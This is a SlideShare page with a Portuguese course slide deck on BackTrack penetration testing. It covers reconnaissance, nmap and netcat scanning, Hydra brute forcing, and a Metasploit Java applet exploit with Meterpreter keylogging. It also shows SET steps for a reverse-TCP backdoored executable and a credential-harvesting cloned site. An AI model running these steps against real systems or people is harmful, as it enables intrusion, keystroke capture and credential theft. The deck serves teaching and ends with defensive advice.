Kleber Santos
Introdução
Introdução
O que é?
• Ferramenta voltada para testes de
penetração;
• Primeira versão lançada em 2006;
• Possui mais de 30...
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

ht...
Introdução
Uso em Certificações

• Todas oferecidas pela Offensive Security que
mantém o BackTrack.
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

ht...
Pentest
•
•
•
•

Metodologia para testes de penetração;
Simula ataques;
Verifica a segurança de um sistema;
Possibilita cr...
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;...
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;...
Primeira Parte
•
•
•
•

Obtenção de Informação;
Detecção de Sistemas Ativos;
Técnica Para Obter Informações DNS;
FINGERPRI...
Obtenção de Informação
• Metodologia usada para "reconhecimento do
terreno";

• Pode ser de forma:
 passiva (recursos na ...
Detecção de
Sistemas Ativos
• Princípios básicos na obtenção de
informações;
• PING detecta hosts ativos;
Detecção de
Sistemas Ativos
FPING:
 Executa ping para diferentes hosts ao
mesmo tempo através de um *.txt;

HPING3:
 Det...
Informações DNS
• DNS traduz endereços de IP em
nomes de domínio;
• A ferramenta nslookup permite obter
informações sobre ...
Informações DNS
DNSENUM:
 Pesquisa de hosts, nomes de servidores, registros MX, IPs,
etc.
DNSMAP:
 Descobre subdomínios ...
FINGERPRINT
• Técnica na qual se obtém informações
sobre sistema operacional;
• O NMAP é utilizado para tal checagem
de ve...
FINGERPRINT
TCP SYN (-sS)
 examina portas de maneira rápida e difícil de
ser detectado por firewalls ou IDS;
TCP Connect ...
FINGERPRINT
TCP FIN (-sF, -sX, -sN)
 utilizados na tentativa de travessia de
firewalls;
TCP ACK (-sA)
 tática utilizada ...
Segunda Parte
• SCANNING de portas
• Detecção de Sistemas Ativos;
• NETCAT – Canivete Suíço;
SCANNING de portas
• Port Scan é a técnica usada para descobrir
serviços vulneráveis em um sistema;
Scanning de portas:
 ...
Detecção de Sistemas Ativos
NETCAT – Canivete Suíço
• Outra ferramenta possível para
varreduras num host;
root@root:~# nc -v -z 192.168.32.128 1-4000
Terceira Parte
• Fase de Enumeração;
• HTTPRINT;
• AMAP, SMTP e SMTPSCAN;
Fase de Enumeração
• Nesta fase o invasor tenta obter:





nomes de máquinas;
usuários;
serviços e versões;
compartil...
Fase de Enumeração
• Através do nmap podemos executar
varredura procurando por serviços que
utilizem o protocolo UDP:
root...
Fase de Enumeração
• Obtendo retorno de serviços snmp
podemos obter informações SNMP
com o Snmpcheck:
root@root:/pentest/e...
HTTPRINT
• Possibilita detectar versões de
servidores;
• Fornece opção de exporta-las para
arquivos *.html, *.csv ou *.xml
AMAP, SMTP e SMTPSCAN
AMAP

 tenta identificar aplicações rodando em
portas diferentes da usual.
SMTP e SMTPScan

 busca...
Quarta Parte
• Ganho de Acesso;
• Abordagem à Força Bruta;
• SET e Metasploit;
Ganho de Acesso
• Utiliza de ferramentas que explorem
serviços como FTP e SSH;
• Explora vulnerabilidades e senhas;
• A té...
Força Bruta
xHydra ou Hidra-GTK
 Ferramenta utilizada para quebra de senhas
ONLINE;
 Suporta diversos protocolos;
 Perm...
Força Bruta
• Dicionários e força bruta são técnicas
utilizadas para o password cracking;
• Outras ferramentas para o mesm...
Invadindo Sistemas com
SET e Metasploit
Metasploit
 Conta com uma interface gráfica
ARMITAGE e também a linha de
comando,...
Invadindo Sistemas com
SET e Metasploit
• Através do comando msfconsole
acessamos o Metasploit via linha de
comando;
• Con...
Invadindo Sistemas com
SET e Metasploit
Invadindo Sistemas com
SET e Metasploit
• root@bt:~# msfconsole
• root@bt:~# search java
• root@bt:~# use
exploit/multi/br...
Invadindo Sistemas com
SET e Metasploit
set srvhost <ip_local_host_backTrack>
set srvport 80
#seta a porta 80 como acesso
...
Invadindo Sistemas com
SET e Metasploit
• Após acessar a URL gerada o alvo
permitirá acesso ao invasor;

sessions –i 1
# d...
Invadindo Sistemas com
SET e Metasploit
help
# lista comandos do METERPRETER
screenshot
# obtém um print da tela da
máquin...
Invadindo Sistemas com
SET e Metasploit
keyscan_start
# starta um sniffer para captura
de navegação
keyscan_dump
# exibe i...
Invadindo Sistemas com
SET e Metasploit
• Técnica semelhante pode ser
explorada através da ferramenta SET
gerando-se um pa...
Invadindo Sistemas com
SET e Metasploit
• Deve-se informar o IP da máquina que
receberá as informações obtidas através
do ...
Invadindo Sistemas com
SET e Metasploit
• Após informar a porta solicitada, ele gerará o
arquivo executável:
/pentest/expl...
Invadindo Sistemas com
SET e Metasploit
• Com a mesma ferramenta SET,
podemos clonar páginas web para
obter informações de...
Invadindo Sistemas com
SET e Metasploit
• Informa-se a URL do site a ser
clonado;
• Acessa-se através do IP da máquina
do ...
Conclusão
• Técnicas de invasão estão
diretamente atreladas às
vulnerabilidades dos sistemas e das pessoas
Conclusão
•
•
•
•
•

Configurar devidamente servidores;
Atualizar devidamente SOs e SWs;
Utilização de senhas fortes;
Desc...
Conclusão
• Atentar à boas práticas voltadas
à segurança nos dá uma garantia quanto
ao CID;
klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
Obrigado !
Back track   apresentação
Back track   apresentação
Back track   apresentação
Back track   apresentação
Back track   apresentação
Back track   apresentação
Back track   apresentação
Back track   apresentação
Upcoming SlideShare
Loading in …5
×

Back track apresentação

1,030 views

Published on

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,030
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
54
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Back track apresentação

  1. 1. Kleber Santos
  2. 2. Introdução
  3. 3. Introdução O que é? • Ferramenta voltada para testes de penetração; • Primeira versão lançada em 2006; • Possui mais de 300 ferramentas para tais testes;
  4. 4. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrack-linux.org/
  5. 5. Introdução Uso em Certificações • Todas oferecidas pela Offensive Security que mantém o BackTrack.
  6. 6. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrackbrasil.com.br/site/vd/
  7. 7. Pentest • • • • Metodologia para testes de penetração; Simula ataques; Verifica a segurança de um sistema; Possibilita criação de mecanismos de defesa;
  8. 8. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  9. 9. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  10. 10. Primeira Parte • • • • Obtenção de Informação; Detecção de Sistemas Ativos; Técnica Para Obter Informações DNS; FINGERPRINT;
  11. 11. Obtenção de Informação • Metodologia usada para "reconhecimento do terreno"; • Pode ser de forma:  passiva (recursos na internet);  ativa (engenharia social);
  12. 12. Detecção de Sistemas Ativos • Princípios básicos na obtenção de informações; • PING detecta hosts ativos;
  13. 13. Detecção de Sistemas Ativos FPING:  Executa ping para diferentes hosts ao mesmo tempo através de um *.txt; HPING3:  Detecta hosts, regras de firewall e realiza varreduras de portas; Genlist:  Verifica uma lista de hosts ativos;
  14. 14. Informações DNS • DNS traduz endereços de IP em nomes de domínio; • A ferramenta nslookup permite obter informações sobre DNS;
  15. 15. Informações DNS DNSENUM:  Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc. DNSMAP:  Descobre subdomínios relacionados ao domínio-alvo. Acompanha wordlist; DNSRECON:  Permite consultas reversas por faixas de IP, NS, SOA, registros MX, transferências de zonas e enumeração de serviços; FIERCE:  Retorna informações adicionais como HINFO, especificando o processador da máquina e o servidor;
  16. 16. FINGERPRINT • Técnica na qual se obtém informações sobre sistema operacional; • O NMAP é utilizado para tal checagem de versões; root@bt~# nmap –O <ip_do_alvo>
  17. 17. FINGERPRINT TCP SYN (-sS)  examina portas de maneira rápida e difícil de ser detectado por firewalls ou IDS; TCP Connect (-sT)  executa varredura utilizando o Three-Way Handshake; UDP (-sU)  possibilita varredura do protocolo UDP;
  18. 18. FINGERPRINT TCP FIN (-sF, -sX, -sN)  utilizados na tentativa de travessia de firewalls; TCP ACK (-sA)  tática utilizada para detecção de regras de firewall; TCP Windows (-sW)  varreduras por janelas, parecido com o método ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
  19. 19. Segunda Parte • SCANNING de portas • Detecção de Sistemas Ativos; • NETCAT – Canivete Suíço;
  20. 20. SCANNING de portas • Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema; Scanning de portas:  identifica portas ativas; De vulnerabilidades:  identifica fraquezas no sistema; De redes:  identifica os hosts ativos;
  21. 21. Detecção de Sistemas Ativos
  22. 22. NETCAT – Canivete Suíço • Outra ferramenta possível para varreduras num host; root@root:~# nc -v -z 192.168.32.128 1-4000
  23. 23. Terceira Parte • Fase de Enumeração; • HTTPRINT; • AMAP, SMTP e SMTPSCAN;
  24. 24. Fase de Enumeração • Nesta fase o invasor tenta obter:     nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc; • A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
  25. 25. Fase de Enumeração • Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP: root@root~# nmap –T4 –sU –sV <ip_host_alvo>
  26. 26. Fase de Enumeração • Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck: root@root:/pentest/enumeration/sn mp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
  27. 27. HTTPRINT • Possibilita detectar versões de servidores; • Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
  28. 28. AMAP, SMTP e SMTPSCAN AMAP  tenta identificar aplicações rodando em portas diferentes da usual. SMTP e SMTPScan  busca usuários válidos do nosso host, destinando um IP alvo;
  29. 29. Quarta Parte • Ganho de Acesso; • Abordagem à Força Bruta; • SET e Metasploit;
  30. 30. Ganho de Acesso • Utiliza de ferramentas que explorem serviços como FTP e SSH; • Explora vulnerabilidades e senhas; • A técnica de engenharia social é extremamente importante em tal etapa;
  31. 31. Força Bruta xHydra ou Hidra-GTK  Ferramenta utilizada para quebra de senhas ONLINE;  Suporta diversos protocolos;  Permite utilização de arquivos auxiliares para listas de usuários e senhas (wordlists);
  32. 32. Força Bruta • Dicionários e força bruta são técnicas utilizadas para o password cracking; • Outras ferramentas para o mesmo intuito são:  Medusa;  John The Ripper; Todas elas inclusas no BackTrack 5 R3;
  33. 33. Invadindo Sistemas com SET e Metasploit Metasploit  Conta com uma interface gráfica ARMITAGE e também a linha de comando, MSFCONSOLE; SET  Tem como alvo fraquezas e estupidez humanas;
  34. 34. Invadindo Sistemas com SET e Metasploit • Através do comando msfconsole acessamos o Metasploit via linha de comando; • Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
  35. 35. Invadindo Sistemas com SET e Metasploit
  36. 36. Invadindo Sistemas com SET e Metasploit • root@bt:~# msfconsole • root@bt:~# search java • root@bt:~# use exploit/multi/browser/java_sign ed_applet • root@bt:~# show options
  37. 37. Invadindo Sistemas com SET e Metasploit set srvhost <ip_local_host_backTrack> set srvport 80 #seta a porta 80 como acesso set uripath <caminho_para_link_url> set appletname <nome_para_o_arquivo_jar> exploit
  38. 38. Invadindo Sistemas com SET e Metasploit • Após acessar a URL gerada o alvo permitirá acesso ao invasor; sessions –i 1 # dá acesso à máquina alvo sysinfo # obtém informações da máquina alvo
  39. 39. Invadindo Sistemas com SET e Metasploit help # lista comandos do METERPRETER screenshot # obtém um print da tela da máquina invadida
  40. 40. Invadindo Sistemas com SET e Metasploit keyscan_start # starta um sniffer para captura de navegação keyscan_dump # exibe informações capturadas
  41. 41. Invadindo Sistemas com SET e Metasploit • Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload; • Ao acessar a ferramenta, navega-se em: 1 – Social Engineering Attacks; 4 – Create a Payload na Listener;
  42. 42. Invadindo Sistemas com SET e Metasploit • Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack); • Feito isso, navega-se em: 2 – Windows Reverse TCP Meterpreter; 16 – Backdoored Executable (BEST);
  43. 43. Invadindo Sistemas com SET e Metasploit • Após informar a porta solicitada, ele gerará o arquivo executável: /pentest/exploits/set msf.exe • Confirma-se com yes o start do listener; • O acesso à máquina alvo se dará após a execução do arquivo pela mesma e executando: sessions –i 1.
  44. 44. Invadindo Sistemas com SET e Metasploit • Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções: 1 2 3 2 – – – – Social Engineering Attacks; Website Attack Vectors; Credential Harvester Attack Vectors; Site Cloner;
  45. 45. Invadindo Sistemas com SET e Metasploit • Informa-se a URL do site a ser clonado; • Acessa-se através do IP da máquina do atacante; Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
  46. 46. Conclusão • Técnicas de invasão estão diretamente atreladas às vulnerabilidades dos sistemas e das pessoas
  47. 47. Conclusão • • • • • Configurar devidamente servidores; Atualizar devidamente SOs e SWs; Utilização de senhas fortes; Desconfiar de coisas óbvias; Usufruir de uma política de segurança;
  48. 48. Conclusão • Atentar à boas práticas voltadas à segurança nos dá uma garantia quanto ao CID;
  49. 49. klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
  50. 50. Obrigado !

×